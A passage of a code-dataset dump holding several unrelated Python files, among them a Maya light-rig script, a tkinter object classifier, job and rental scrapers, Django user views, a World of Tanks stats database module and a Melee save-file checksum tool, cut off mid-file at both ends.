vtx.split('_')[3]\n lightShape = cmds.createNode('aiAreaLight', name='AreaLight_' + id)\n light = cmds.listRelatives(lightShape, parent=True)[0]\n cmds.addAttr(light, longName='cpvColor', attributeType='float3')\n cmds.addAttr(light, longName='cpvColorX', attributeType='float', parent='cpvColor')\n cmds.addAttr(light, longName='cpvColorY', attributeType='float', parent='cpvColor')\n cmds.addAttr(light, longName='cpvColorZ', attributeType='float', parent='cpvColor')\n cmds.connectAttr('vertexConstraint*_' + colorBake + '_vtx_' + id + '.translateX', light + '.cpvColorX')\n cmds.connectAttr('vertexConstraint*_' + colorBake + '_vtx_' + id + '.translateY', light + '.cpvColorY')\n cmds.connectAttr('vertexConstraint*_' + colorBake + '_vtx_' + id + '.translateZ', light + '.cpvColorZ')\n cmds.connectAttr(ctrl + '.locatorsDisplay', 'vertexConstraint*_' + mesh + '_vtx_Shape' + id + '.lodVisibility')\n cmds.connectAttr(ctrl + '.lightsDisplay', light + '.lodVisibility')\n #cmds.connectAttr(ctrl + '.IESfile', lightShape + '.aiFilename')\n cmds.connectAttr(ctrl + '.NormalOffset', light + '.translateX')\n cmds.connectAttr(ctrl + '.lightsScale', light + '.scaleX')\n cmds.connectAttr(ctrl + '.lightsScale', light + '.scaleY')\n cmds.connectAttr(ctrl + '.lightsScale', light + '.scaleZ')\n cmds.connectAttr(ctrl + '.Exposure', lightShape + '.aiExposure')\n cmds.connectAttr(ctrl + '.EmitDiffuse', lightShape + '.emitDiffuse')\n cmds.connectAttr(ctrl + '.EmitSpec', lightShape + '.emitSpecular')\n\n cmds.connectAttr(ctrl + '.Intensity', lightShape + '.intensity')\n cmds.connectAttr(ctrl + '.Spread', lightShape + '.aiSpread')\n\n cmds.connectAttr(ctrl + '.DiffuseContribution', lightShape + '.aiDiffuse')\n cmds.connectAttr(ctrl + '.SpecularContribution', lightShape + '.aiSpecular')\n cmds.connectAttr(ctrl + '.SSSContribution', lightShape + '.aiSss')\n cmds.connectAttr(ctrl + '.IndirectContribution', lightShape + '.aiIndirect')\n cmds.connectAttr(ctrl + '.VolumeContribution', lightShape + '.aiVolume')\n\n lightShape = cmds.listRelatives(light, shapes=True)\n cmds.connectAttr(light + '.cpvColor', lightShape[0] + '.color')\n cmds.parent(light, vtx, relative=True)\n target = cmds.spaceLocator(name=mesh + light + id + '_target')[0]\n cmds.parent(target, vtx, relative=True)\n cmds.setAttr(target + '.translateX', 10)\n cmds.aimConstraint(target, light, weight=1, offset=(0, -90, 90), aimVector=(1, 0, 0), upVector=(0, 1, 0),worldUpType='vector', worldUpVector=(0, 1, 0))\n cmds.connectAttr(ctrl + '.lightsScale', target + '.localScaleX')\n cmds.connectAttr(ctrl + '.lightsScale', target + '.localScaleY')\n cmds.connectAttr(ctrl + '.lightsScale', target + '.localScaleZ')\n cmds.connectAttr(ctrl + '.targetsDisplay', target + '.visibility')\n cmds.connectAttr(ctrl + '.targetsScale', target + '.scaleX')\n cmds.connectAttr(ctrl + '.targetsScale', target + '.scaleY')\n cmds.connectAttr(ctrl + '.targetsScale', target + '.scaleZ')\n\n# Sort things\n\nlocsCol = cmds.select('vertexConstraint*_' + colorBake + '_vtx_*')\ncmds.group(name=mesh + '_colorHisto')\ncolGrp = cmds.ls(sl=True)[0]\nlocsPos = cmds.select('vertexConstraint*_' + mesh + '_vtx_*')\ncmds.group(name=mesh + '_posHisto')\nposGrp = cmds.ls(sl=True)[0]\ncmds.parent(colorBake, colGrp)\ncmds.setAttr(colGrp + '.visibility', 0)\ncmds.group(name=mesh + '_targetsPos', empty=True, world=True)\ntargetGrp = cmds.ls(sl=True)[0]\ncmds.select(mesh + '*_target')\ntargets = cmds.ls(sl=True)\ncmds.parent(targets, targetGrp, absolute=True)\n\nanno = cmds.annotate(ctrl, text='Light controls for ' + mesh, point=(0, 7, 0))\nannoTransform = cmds.listRelatives(anno, parent=True)[0]\ncmds.parent(anno, ctrl, shape=True, relative=True)\ncmds.delete(annoTransform)\ncmds.select(ctrl)\n","repo_name":"nagasimon/Maya","sub_path":"divers/lightRig_paolo.py","file_name":"lightRig_paolo.py","file_ext":"py","file_size_in_byte":8135,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} +{"seq_id":"4530548895","text":"#!/usr/bin/env python3\n\nimport sys\n\ndef main():\n for line in sys.stdin:\n a = []\n for i in line.strip():\n if i.islower():\n i = i.replace(i, \" \")\n a.append(i)\n\n a = \"\".join(a).split(\" \")\n print(max(a))\n\nif __name__ == '__main__':\n main()\n","repo_name":"AnzheYuan1217/DCU","sub_path":"CA117/Sample_LabExam/uppers_052.py","file_name":"uppers_052.py","file_ext":"py","file_size_in_byte":307,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} +{"seq_id":"27807218423","text":"import cv2\r\nfrom tkinter import *\r\nfrom PIL import Image,ImageTk\r\nfrom tkinter import ttk\r\nfrom tkinter import filedialog as fd\r\nimport pickle\r\n\r\ndef ml_work(filename,x):\r\n new_img = cv2.imread(filename)\r\n new_img = cv2.resize(new_img,(150,200))\r\n new_img = new_img.flatten()\r\n p = open(\"obj.txt\",\"rb\")\r\n model = pickle.load(p)\r\n ar = model.predict([new_img])\r\n l = ['computer mouse', 'neckband headset', 'smart watch']\r\n name_obj = l[int(ar[0])]\r\n if x == 1:\r\n obj_l.config(text=name_obj)\r\n elif x==2:\r\n obj_c.config(text=name_obj)\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\ncancel = False\r\n\r\ndef prompt_ok(event = 0):\r\n global cancel, button, button1, button2\r\n cancel = True\r\n\r\n button.place_forget()\r\n button1 = Button(cam, text=\"Good Image!\", command=saveAndExit)\r\n button1.place(anchor=CENTER, relx=0.2, rely=0.9, width=150, height=50)\r\n button2 = Button(cam, text=\"Try Again\", command=resume)\r\n button2.place(anchor=CENTER, relx=0.8, rely=0.9, width=150, height=50)\r\n button1.focus()\r\n\r\ndef saveAndExit(event = 0):\r\n global img,lmain\r\n\r\n filepath = \"imageCap.png\"\r\n img.save(filepath)\r\n lmain.focus()\r\n ml_work(filepath, 2)\r\n\r\ndef resume(event = 0):\r\n global button1, button2, button, lmain, cancel\r\n\r\n cancel = False\r\n\r\n button1.place_forget()\r\n button2.place_forget()\r\n\r\n button.place(bordermode=INSIDE, relx=0.5, rely=0.9, anchor=CENTER, width=300, height=50)\r\n lmain.after(10, video_stream)\r\n\r\ndef video_stream():\r\n global img\r\n _, frame = cap.read()\r\n frame = cv2.flip(frame,1)\r\n frame = cv2.resize(frame,(600,500))\r\n cv2image = cv2.cvtColor(frame, cv2.COLOR_BGR2RGBA)\r\n img = Image.fromarray(cv2image)\r\n imgtk = ImageTk.PhotoImage(image=img)\r\n lmain.imgtk = imgtk\r\n lmain.configure(image=imgtk)\r\n if not cancel:\r\n lmain.after(10, video_stream)\r\n\r\n\r\ndef open_camera():\r\n global cap,lmain,cam,button\r\n cam = Toplevel()\r\n cam.resizable(width=False, height=False)\r\n cap = cv2.VideoCapture(0)\r\n capWidth = cap.get(3)\r\n capHeight = cap.get(4)\r\n\r\n lmain = Label(cam, compound=CENTER, anchor=CENTER, relief=RAISED)\r\n lmain.pack()\r\n\r\n button = Button(cam, text=\"Capture\", command=prompt_ok)\r\n button.place(bordermode=INSIDE, relx=0.5, rely=0.9, anchor=CENTER, width=300, height=50)\r\n button.focus()\r\n\r\n video_stream()\r\n\r\n cam.mainloop()\r\n\r\n\r\ndef local_com():\r\n filetypes = (('image jpg files', '*.jpg'),('png files', '*.png'))\r\n filename = fd.askopenfilename(title='Open a file',initialdir='/',filetypes=filetypes)\r\n ml_work(filename,1)\r\n\r\n\r\n\r\n\r\n\r\n\r\nwin = Tk()\r\nwin.geometry(\"1020x500\")\r\nwin.resizable(False,False)\r\nwin.title(\"Object Classification\")\r\nwin.config(bg = \"yellow\")\r\n\r\n\r\n\r\nLabel(win,text=\"Local Computer Drive\",font = (\"Time New Roman\",30,\"bold\"),bg = \"yellow\").place(x=50,y=70,height=60,width=410)\r\n\r\nlocal = Button(win,text = \"Open Folder\",font = (\"Time New Roman\",20,\"bold\"),command=local_com)\r\nlocal.place(x=150,y=180,height=60,width=200)\r\n\r\ncanvas = Canvas(win, width=5, height=win.winfo_screenheight(), bg='yellow',borderwidth=0)\r\ncanvas.place(x = 510,y=0)\r\ncanvas.create_line((5, 0), (5, win.winfo_screenheight()), width=5, fill='gray')\r\n\r\nLabel(win,text=\"Object Name : \",font = (\"Time New Roman\",30,\"bold\"),bg = \"yellow\").place(x=50,y=290,height=60,width=410)\r\n\r\nobj_l = Label(win,text=\"\",font = (\"Time New Roman\",30,\"bold\"))\r\nobj_l.place(x=50,y=370,height=60,width=410)\r\n\r\n\r\nLabel(win,text=\"Open Camera\",font = (\"Time New Roman\",30,\"bold\"),bg = \"yellow\").place(x=560,y=70,height=60,width=410)\r\n\r\ncam1 = Button(win,text = \"Open Camera\",font = (\"Time New Roman\",20,\"bold\"),command=open_camera)\r\ncam1.place(x=660,y=180,height=60,width=200)\r\n\r\nLabel(win,text=\"Object Name : \",font = (\"Time New Roman\",30,\"bold\"),bg = \"yellow\").place(x=560,y=290,height=60,width=410)\r\n\r\nobj_c = Label(win,text=\"\",font = (\"Time New Roman\",30,\"bold\"))\r\nobj_c.place(x=560,y=370,height=60,width=410)\r\n\r\nwin.mainloop()","repo_name":"gauravprajapat29/object_detection_and_name_prediction","sub_path":"object_classification.py","file_name":"object_classification.py","file_ext":"py","file_size_in_byte":4034,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} +{"seq_id":"713686373","text":"import requests\nfrom bs4 import BeautifulSoup, element\n\n\nclass Indeed:\n def __init__(self, words, location, offset):\n self.url = \"https://www.indeed.com/jobs?as_and={}&l={}&sort=date&start={}\".format(\n \"+\".join(set(d.strip().lower() for d in words.split(\",\") if d)),\n \"+\".join(list(d.lower() for d in location.split(\" \") if d)),\n int(offset),\n )\n\n def extract(self, soup):\n if not soup:\n return []\n jobs = []\n for tag in soup.find_all(name=\"div\", attrs={\"class\": \"jobsearch-SerpJobCard\"}):\n job = {}\n for child in tag.children:\n if child and type(child) == element.Tag and child.attrs:\n if child.attrs[\"class\"][0] == \"title\":\n job[\"title\"] = child.get_text().strip()\n for grandchild in child.find_all(name=\"a\"):\n if grandchild.has_attr(\"href\"):\n job[\"link\"] = (\n \"https://www.indeed.com\" + grandchild[\"href\"]\n )\n elif child.attrs[\"class\"][0] == \"sjcl\":\n lines = child.get_text().strip().split(\"\\n\")\n job[\"company\"] = lines[0]\n job[\"location\"] = lines[-1]\n elif child.attrs[\"class\"][0] == \"jobsearch-SerpJobCard-footer\":\n job[\"date\"] = \"n/a\"\n for grandchild in child.find_all(\n name=\"span\", attrs={\"class\": \"date\"}\n ):\n job[\"date\"] = grandchild.get_text()\n jobs.append(job)\n return jobs\n\n def fetch(self):\n soup = None\n try:\n r = requests.get(self.url)\n r.raise_for_status()\n soup = BeautifulSoup(r.text, \"html.parser\")\n finally:\n return soup\n\n def search(self):\n soup = self.fetch()\n jobs = self.extract(soup)\n return jobs\n","repo_name":"kzkaneoka/custom-job-search","sub_path":"services/backend/project/api/sites.py","file_name":"sites.py","file_ext":"py","file_size_in_byte":2074,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} +{"seq_id":"5450055364","text":"from django.shortcuts import render, get_object_or_404\nfrom django.contrib.auth.forms import AuthenticationForm\nfrom django.views.generic import DetailView\nfrom django.views.generic.edit import FormView\nfrom django.contrib.auth import login, logout\nfrom django.views.generic.base import View\nfrom django.http import HttpResponseRedirect\n\nfrom shop.forms import CreationItemForm\nfrom shop.models import Item\nfrom users.forms import *\nfrom users.models import Profile\n\n\nclass LoginFormView(FormView):\n form_class = AuthenticationForm\n template_name = \"login.html\"\n success_url = \"/\"\n\n def form_valid(self, form):\n self.user = form.get_user()\n login(self.request, self.user)\n return super(LoginFormView, self).form_valid(form)\n pass\n\n\ndef registration(request):\n if request.method == 'POST':\n form = SingUp(request.POST, request.FILES)\n if form.is_valid():\n user = form.save(commit=False)\n #user.is_active = False\n user.save()\n\n profile = Profile()\n profile.user = user\n profile.ava = request.FILES['account_image']\n profile.save()\n return HttpResponseRedirect(\"/users/login\")\n else:\n form = SingUp()\n return render(request, 'reg.html', {'form': form})\n\n\nclass LogoutFormView(View):\n\n def get(self, request):\n logout(request)\n return HttpResponseRedirect(\"/\")\n pass\n\n\nclass ProfileUser(DetailView):\n\n template_name = \"profile.html\"\n\n def get(self, request, id):\n form = CreationItemForm()\n user = get_object_or_404(User, id=id)\n profile = get_object_or_404(Profile, user=user)\n items = Item.objects.filter(owner=id)\n #users = User.objects.all().select_related('profile')\n return render(request, self.template_name, {'current_user': user, 'profile': profile, 'form': form, 'items': items})\n\n def post(self, request, *args, **kwargs):\n form = CreationItemForm(request.POST, request.FILES)\n if form.is_valid():\n id = kwargs['id']\n cd = form.cleaned_data\n user = get_object_or_404(User, id=id)\n profile = get_object_or_404(Profile, user=user)\n\n item = Item(owner=user,\n category=cd['category'],\n icon=cd['icon'],\n name=cd['name'],\n price=cd['price'],\n description=cd['description']).save()\n self.get(request, id)\n form = CreationItemForm()\n return render(request, self.template_name, {'current_user': user, 'profile': profile, 'form': form})","repo_name":"vadimsmilgin/salePlace","sub_path":"users/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2676,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} +{"seq_id":"18236375962","text":"# -*- coding: utf-8 -*-\n# @Time : 18/03/2018\n# @Author : Luke\n\nimport math\nimport os\nimport random\n\nimport numpy as np\nimport pymongo\nfrom fake_useragent import UserAgent\n\nMINPRICE = 2000 # 最低价格\nMAXPRICE = 3500 # 最高价格\nMAXDISTANCE = 7 # 距离目标地点与可选地点之间的距离之和\nCITY = \"上海\" # 城市\nNB_ROOM = {'1室', '2室', } # 房间数\n\nCOOKIE = None\nproxies = [\n \"http://localhost:1087\",\n ''\n] # 代理地址\n\nak = \"\" #百度lbs服务key,请自行申请(http://lbsyun.baidu.com/apiconsole/key)\n# 若使用其他lbs服务,请同时修改pipelines中的 get_lbs 函数\n\n# GPS, (longitude,latitude)\n# primary\nGPS1 = {\"lat\": 31.239777,\n \"lng\": 121.669717} # 目标地点的gps信息\n# Secondary # 可选地点gps信息\nGPS2 = [\n # {\"lat\": 31.219828,\n # \"lng\": 121.662625}, # 唐镇地铁站\n # {\"lat\": 31.216703,\n # \"lng\": 121.627179}, # 广兰路地铁站\n {\"lat\": 31.269485,\n \"lng\": 121.64549}, # 金海路地铁站\n {\"lat\": 31.272188,\n \"lng\": 121.663}, # 顾唐路地铁站\n {\"lat\": 31.274649,\n \"lng\": 121.674609}, # 明雷路地铁站\n {\"lat\": 31.26994,\n \"lng\": 121.634401} # 金吉路地铁站\n]\nlocations = [ # 与GPS2对应的地点名\n # \"唐镇地铁站\",\n # \"广兰路地铁站\",\n \"金海路地铁站\",\n \"顾唐路地铁站\",\n \"明雷路地铁站\",\n \"金吉路地铁站\",\n]\n\n\ndef get_collection(host, db, collection):\n client = pymongo.MongoClient(host)\n db = client[db]\n collection = db[collection]\n return collection\n\ncollection = get_collection('localhost', 'mydb', 'rent_info') # 保存mango表信息\n\n\nRADIUS = 6378.137 # km\n\nutils_path = os.path.abspath(__file__)\nutils_path = os.path.split(utils_path)[0]\n\n\ndef write_files(file_path, list: iter):\n length = len(list)\n with open(file_path, 'w') as f:\n for i, item in list:\n if hasattr(item, '__len__'):\n f.writelines(' '.join(item))\n else:\n f.writelines(item)\n if i < length:\n f.writelines('\\n')\n\n\ndef random_interval():\n print('generate interval')\n return np.random.rand() * 5\n\n\nua = UserAgent(use_cache_server=False, verify_ssl=False)\n\n\ndef random_agent():\n headers = {'User-Agent': ua.random}\n return headers\n\n\ndef gps2distance(origin, destination):\n lat1, lon1 = origin['lat'], origin['lng']\n lat2, lon2 = destination['lat'], destination['lng']\n\n dlat = math.radians(lat2 - lat1)\n dlon = math.radians(lon2 - lon1)\n a = math.sin(dlat / 2) * math.sin(dlat / 2) + math.cos(math.radians(lat1)) \\\n * math.cos(math.radians(lat2)) * math.sin(dlon / 2) * math.sin(dlon / 2)\n c = 2 * math.atan2(math.sqrt(a), math.sqrt(1 - a))\n d = RADIUS * c\n\n return d\n\n\nalphabet = [chr(c) for c in range(97, 123)]\n\n\ndef random_string():\n length = random.randint(3, 7)\n return ''.join([random.choice(alphabet) for _ in range(length)])\n\n\ndef random_key_value():\n key = random_string()\n value = random_string()\n return key + '=' + value\n\n\nif __name__ == '__main__':\n print(random_key_value())\n","repo_name":"nju-luke/RentInfo","sub_path":"spider/tc58/tc58/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":3214,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} +{"seq_id":"35650986643","text":"# -*- coding: utf8 -*-\nfrom config import cos_config\nfrom qcloud_cos import CosConfig, CosS3Client\n\nconfig = CosConfig(Region=cos_config[\"region\"], Secret_id=cos_config[\"secret_id\"],\n Secret_key=cos_config[\"secret_key\"], Token=cos_config[\"cos_token\"])\ncos_client = CosS3Client(config)\n\n\ndef calculate_sign(path=None, method=\"POST\", headers=None, params=None):\n if params is None:\n params = {}\n if headers is None:\n headers = {}\n if path is None:\n path = {}\n sign = cos_client.get_auth(Method=method,\n Bucket=cos_config[\"bucket\"] + \"-\" + cos_config[\"app_id\"],\n Key=path,\n Headers=headers,\n Params=params)\n return sign\n","repo_name":"MeiCorl/ShoppingMall","sub_path":"utils/cos_util.py","file_name":"cos_util.py","file_ext":"py","file_size_in_byte":791,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"92"} +{"seq_id":"13354846414","text":"from pymongo import MongoClient\nclient = MongoClient()\n\n# print(client.database_names()) #print the name of available databases\ndb = client.Northwind\ncustomers = db.customers\nproducts = db.products\norders = db.orders\norder_details = db['order-details']\n\n\nfor order in orders.find({\"CustomerID\":\"ALFKI\"}):\n for order_detail in order_details.find({\"OrderID\":order[\"OrderID\"]}):\n for product in products.find({\"ProductID\":order_detail[\"ProductID\"]}):\n print(order[\"OrderID\"], product[\"ProductName\"], product[\"ProductID\"])\n","repo_name":"Anonyme38/Computational-Tools-for-Big-Data","sub_path":"SQL_NO-SQL/ex1_pymongo.py","file_name":"ex1_pymongo.py","file_ext":"py","file_size_in_byte":551,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} +{"seq_id":"21819329615","text":"import sqlite3\nimport pandas as pd\n\nfrom .conn import conn, cur\n\n\n#Functions for 'tanks' table.\n\n\ndef get_percentiles_data(tank_ids):\n columns = [\n 'battle_life_time', 'battles', 'capture_points', 'damage_assisted_radio',\n 'damage_assisted_track', 'damage_dealt', 'damage_received', 'direct_hits_received',\n 'dropped_capture_points', 'explosion_hits', 'explosion_hits_received', 'frags',\n 'hits', 'losses', 'mark_of_mastery', 'max_frags',\n 'max_xp', 'no_damage_direct_hits_received', 'piercings', 'piercings_received',\n 'shots', 'spotted', 'survived_battles', 'trees_cut',\n 'wins', 'xp'\n ]\n\n tank_ids_str = ', '.join([str(x) for x in tank_ids])\n columns_str = ', '.join(columns)\n\n data = cur.execute(f'''\n SELECT {columns_str} FROM tanks WHERE tank_id IN ({tank_ids_str});\n ''').fetchall()\n\n return columns, data\n\n\ndef get_dataframe(tank_ids, columns, min_battles=1):\n\n tank_ids_str = ', '.join([str(x) for x in tank_ids])\n columns_str = ', '.join(columns)\n\n return pd.read_sql(f'''\n SELECT {columns_str} FROM tanks\n WHERE tank_id IN ({tank_ids_str}) AND battles >= {min_battles}\n ''', conn)\n\n\ndef insert_tank(tank_data):\n '''Insert one tank into database.\n\n Arguments:\n tank_data:Dict[str, num] - data dictionary for a tank.\n Returns:\n None\n '''\n\n columns = [\n 'tank_id', 'last_battle_time', 'account_id',\n 'server', 'battle_life_time', 'battles',\n 'capture_points', 'damage_assisted_radio', 'damage_assisted_track',\n 'damage_dealt', 'damage_received', 'direct_hits_received',\n 'dropped_capture_points', 'explosion_hits', 'explosion_hits_received',\n 'frags', 'hits', 'losses',\n 'mark_of_mastery', 'max_frags', 'max_xp',\n 'no_damage_direct_hits_received', 'piercings', 'piercings_received',\n 'shots', 'spotted', 'survived_battles',\n 'trees_cut', 'wins', 'xp'\n ]\n\n columns_str = ', '.join(columns)\n question_marks = ', '.join(['?' for _ in columns])\n\n #Triggers replace if there is a tank_id for the same player in database.\n query = f'INSERT OR REPLACE INTO tanks ({columns_str}) VALUES ({question_marks});'\n values = [tank_data[name] for name in columns]\n cur.execute(query, values)\n\n\ndef cleanup_space(tank_id, min_battles):\n '''Remove up to 10 records with less than minimum number of battles.\n Or remove 50 oldest records.\n\n Arguments:\n tank_id:int - tank_id to remove rows of.\n min_battles:int - minimum battles for the tank_id.\n Returns:\n None\n '''\n\n #Getting count of tanks with battles less than minimum.\n count = cur.execute('''\n SELECT COUNT(*) FROM tanks\n WHERE tank_id = ? AND battles < ?;\n ''', (tank_id, min_battles)).fetchone()[0]\n\n\n if count > 0:\n #Deleting oldest 50 with battles less than minimum.\n cur.execute('''\n DELETE FROM tanks\n WHERE tank_id = ? AND account_id IN (\n SELECT account_id FROM tanks\n WHERE tank_id = ? AND battles < ?\n ORDER BY last_battle_time ASC LIMIT 50\n );\n ''', (tank_id, tank_id, min_battles))\n else:\n #Deleting oldest 10.\n cur.execute('''\n DELETE FROM tanks\n WHERE tank_id = ? AND last_battle_time IN (\n SELECT last_battle_time FROM tanks\n WHERE tank_id = ?\n ORDER BY last_battle_time ASC LIMIT 10\n );\n ''', (tank_id, tank_id))\n\n\ndef insert_player(player_data, tankopedia):\n '''Insert tanks for one player.\n \n Arguments:\n player_data:List[Obj] - player tanks as list of dictionaries.\n tankopedia:Dict[str, Obj] - tankopedia object.\n Returns:\n None\n '''\n\n for tank_data in player_data:\n tank_id = tank_data['tank_id']\n\n #Getting count of the tank_id.\n count = cur.execute('SELECT COUNT(account_id) FROM tanks WHERE tank_id = ?', (tank_id,)).fetchone()[0]\n\n #No min_battles check.\n if count < 1000:\n insert_tank(tank_data)\n continue\n\n #Calculating min_battles. Skip if tank not in tankopedia.\n tier = tankopedia.get(str(tank_id), {}).get('tier')\n if tier:\n min_battles = tier * 10 + tier * 10 / 2\n\n #Cleanup if too many.\n if count >= 1100:\n cleanup_space(tank_id, min_battles)\n\n if tank_data['battles'] >= min_battles:\n insert_tank(tank_data)\n\n conn.commit()\n","repo_name":"chipsi007/wot-console-wn8","sub_path":"main/database/table_tanks.py","file_name":"table_tanks.py","file_ext":"py","file_size_in_byte":4861,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} +{"seq_id":"42827524752","text":"\"\"\" ssbm_format.py - interfaces for manipulating Melee savefiles \"\"\"\n\nimport os\nimport struct\n\nfrom ssbmpack import unpack, pack\n\nclass melee_gci(object):\n \"\"\" Base class for GCI files. Just basic setter/getter stuff for dentry\n data, and some machinery for reading files \"\"\"\n\n def __init__(self, filename, packed=None):\n self._filename = os.path.basename(filename).split(\".\")[0]\n self.raw_bytes = bytearray()\n try:\n self.fd = open(filename, \"rb\")\n self.filesize = os.stat(filename).st_size\n self.raw_bytes = bytearray(self.fd.read(self.filesize))\n self.fd.seek(0x0)\n print(\"Read {} bytes from input GCI\".format(hex(self.filesize)))\n except FileNotFoundError as e:\n err(e)\n self.fd = None\n self.raw_bytes = None\n self.filesize = None\n return None\n\n # Let the user tell us whether or not the GCI is packed when importing\n # a file - this should help us tell the user not to do something that\n # might end up corrupting their data (or something to that effect).\n self.packed = packed\n\n ''' These functions return other types '''\n\n def blocksize(self):\n return struct.unpack(\">h\", self.raw_bytes[0x38:0x3a])[0]\n\n ''' These functions return raw bytes '''\n\n def dump(self):\n return self.raw_bytes\n def get_dentry(self):\n return self.raw_bytes[0:0x40]\n def get_game_id(self):\n return self.raw_bytes[0x00:0x04]\n def get_maker_code(self):\n return self.raw_bytes[0x04:0x06]\n def get_filename(self):\n return self.raw_bytes[0x08:0x28]\n def get_modtime(self):\n return self.raw_bytes[0x28:0x2c]\n def get_image_off(self):\n return self.raw_bytes[0x2c:0x30]\n def get_icon_fmt(self):\n return self.raw_bytes[0x30:0x32]\n def get_anim_speed(self):\n return self.raw_bytes[0x32:0x34]\n def get_permissions(self):\n return self.raw_bytes[0x34:0x35]\n def get_copy_ctr(self):\n return self.raw_bytes[0x35:0x36]\n def get_first_block(self):\n return self.raw_bytes[0x36:0x38]\n def get_block_count(self):\n return self.raw_bytes[0x38:0x3a]\n def get_comment_addr(self):\n return self.raw_bytes[0x3c:0x40]\n def set_filename(self, new_filename):\n self.raw_bytes[0x08:0x28] = new_filename\n def set_modtime(self, new_modtime):\n self.raw_bytes[0x28:0x2c] = struct.pack(\">L\", new_modtime)\n def set_block_count(self, new_bc):\n self.raw_bytes[0x38:0x3a] = new_bc\n def set_comment_addr(self, new_addr):\n self.raw_bytes[0x3c:0x40] = new_addr\n def set_permissions(self, new_perm):\n self.raw_bytes[0x34:0x35] = struct.pack(\">B\", new_perm)\n def _checksum(self, target_offset, count):\n \"\"\" Given some offset into raw_bytes and a count, compute checksum\n over the set of bytes in the GCI \"\"\"\n\n # This is the seed for all checksum values\n new_checksum = bytearray( b'\\x01\\x23\\x45\\x67\\x89\\xAB\\xCD\\xEF' +\n b'\\xFE\\xDC\\xBA\\x98\\x76\\x54\\x32\\x10' )\n cur = 0\n cur_arr = 0\n arr_pos = 0\n x = 0\n y = 0\n ctr = (count) / 8\n while (ctr > 0):\n for i in range(0, 8):\n cur = self.raw_bytes[target_offset + i]\n cur_arr = new_checksum[(arr_pos & 0xf)]\n new_checksum[(arr_pos & 0xf)] = (cur + cur_arr) & 0xff\n arr_pos += 1\n ctr -= 1\n target_offset += 8\n for i in range(1, 0xf):\n x = new_checksum[i-1]\n y = new_checksum[i]\n if (x == y):\n x = y ^ 0x00FF\n new_checksum[i] = x\n return new_checksum\n\nclass melee_gamedata(melee_gci):\n ''' Class representing a plain-ol' Melee gamedata savefile (0x16040 bytes).\n The checksum/packing functions here are specific to the format,\n so you'll need another class for other types of save files. '''\n\n def get_raw_checksum(self, blknum):\n \"\"\" Return checksum bytes for some block 0-10 \"\"\"\n base_offset = 0x2040\n if (blknum >= 0) and (blknum <= (self.blocksize()-1)):\n target_offset = base_offset + (blknum * 0x2000)\n return self.raw_bytes[target_offset:target_offset + 0x10]\n else:\n return None\n\n def set_raw_checksum(self, blknum, new_checksum):\n \"\"\" Given some blknum 0-10 and a 0x10-byte bytearray, replace the\n specified checksum bytes with the new bytes \"\"\"\n base_offset = 0x2040\n if (blknum >= 0) and (blknum <= (self.blocksize() -1)):\n target_offset = base_offset + (blknum * 0x2000)\n self.raw_bytes[target_offset:target_offset + 0x10] = new_checksum\n else:\n print(\"[!] Can't set checksum bytes for block {}\".format(blknum))\n exit(-1)\n\n def checksum_block(self, blknum):\n \"\"\" Given some block number 0-10, compute the checksum for the\n associated data. Returns the raw checksum bytes. \"\"\"\n base_offset = 0x2050\n data_size = 0x1ff0\n if (blknum >= 0) and (blknum <= (self.blocksize() - 1)):\n target_offset = base_offset + (blknum * 0x2000)\n return self._checksum(target_offset, data_size)\n else:\n print(\"[!] Can't compute checksum bytes for block {}\".format(blknum))\n exit(-1)\n\n def recompute_checksums(self):\n \"\"\" Recompute all checksum values and write them back \"\"\"\n if (self.packed is True):\n print(\"[!] You can only recompute checksums on unpacked data\")\n exit(-1)\n\n # Retrieve checksum values for all blocks\n current = []\n for i in range(0, self.blocksize()-1):\n current.append(self.get_raw_checksum(i))\n\n # Compute checksum values for all blocks\n computed = []\n for i in range(0, self.blocksize()-1):\n computed.append(self.checksum_block(i))\n\n # If current checksums don't match, write them back\n for i in range(0, self.blocksize()-1):\n if (current[i] != computed[i]):\n print(\"[*] Block {} checksum mismatch, fixing ..\".format(i))\n self.set_raw_checksum(i, computed[i])\n else:\n print(\"[*] Block {} checksum unchanged\".format(i))\n\n def get_block(self, blknum):\n ''' Get the data portion of some block '''\n if (blknum > 10):\n return None\n base = 0x2000 * blknum + 0x2060\n return self.raw_bytes[base:(base + 0x1fe0)]\n\n def set_block(self, blknum, data):\n ''' Set the data on some block; takes a 0x1fe0-byte bytearray '''\n if (blknum > 10):\n return None\n base = 0x2000 * blknum + 0x2060\n self.raw_bytes[base:(base + 0x1fe0)] = data\n\n def unpack(self):\n \"\"\" Unpack all blocks of data \"\"\"\n if (self.packed is False):\n print(\"[!] Data is already unpacked - refusing to unpack\")\n exit(-1)\n print(\"[*] Unpacking GCI data\")\n\n PREV_BYTE_OFFSET = 0x204f\n BASE_OFFSET = 0x2050\n DATA_SIZE = 0x1ff0\n for j in range(0, self.blocksize()-1):\n prev = self.raw_bytes[PREV_BYTE_OFFSET]\n for i in range(BASE_OFFSET, BASE_OFFSET + DATA_SIZE):\n cursor = self.raw_bytes[i]\n res = unpack(prev, cursor)\n self.raw_bytes[i] = res\n prev = cursor\n PREV_BYTE_OFFSET += 0x2000\n BASE_OFFSET += 0x2000\n if (self.packed is True):\n self.packed = False\n\n def pack(self):\n \"\"\" Pack all blocks of data \"\"\"\n if (self.packed is True):\n print(\"[!] Data is already packed -- refusing to pack\")\n exit(-1)\n print(\"[*] Packing GCI data\")\n\n PREV_BYTE_OFFSET = 0x204f\n BASE_OFFSET = 0x2050\n DATA_SIZE = 0x1ff0\n for j in range(0, self.blocksize()-1):\n prev = self.raw_bytes[PREV_BYTE_OFFSET]\n for i in range(BASE_OFFSET, BASE_OFFSET + DATA_SIZE):\n cursor = 